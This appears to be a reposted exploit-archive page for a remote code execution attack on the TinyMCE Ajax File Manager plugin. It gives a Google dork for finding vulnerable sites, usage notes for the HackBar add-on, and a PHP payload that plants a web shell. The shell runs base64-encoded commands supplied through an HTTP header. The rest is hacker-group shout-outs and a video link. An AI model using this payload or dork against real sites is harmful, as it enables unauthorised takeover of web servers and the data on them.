Home / exploits TinyMCE Ajax File Manager Remote Code Execution
Posted on 30 April 2013
____ ____ ____ _______/ |________ ____ ____ / _ / \_/ __ / ___/ __\_ __ \_/ __ \_/ __ ( <_> ) | ___/ \___ | | | | / ___/ ___/ \____/|___| /\___ >____ > |_ | |__| \___ >\___ > / / / / / # Exploit Title : timynce Ajax File Manager Remote Code # Author : By onestree # Software Link : http://www.phpletter.com/Demo/Tinymce-Ajax-File-Manager/ # tested : windows 7 # Dork : inurl:"/plugins/filemanager/" or inurl:'/timynce/plugins/" ************************************************************* how to run the exploit use firefox web browser and download firefox add ons HackBar exploit : foo=<?php error_reporting(0);print(system('onestree'));passthru(base64_decode($_SERVER[HTTP_CMD]));die; ?> ==================================================================== tutorial video https://www.youtube.com/watch?v=ahli-dehYWY Thanks : Exploit-db | Alex_Ownz | alm.teardrop | abhelink | kalong666 | prorebell indonesiancoder - moeslimh4x0r - go-coder spesial my hunny ( Fheby Yahya) :* muaaah
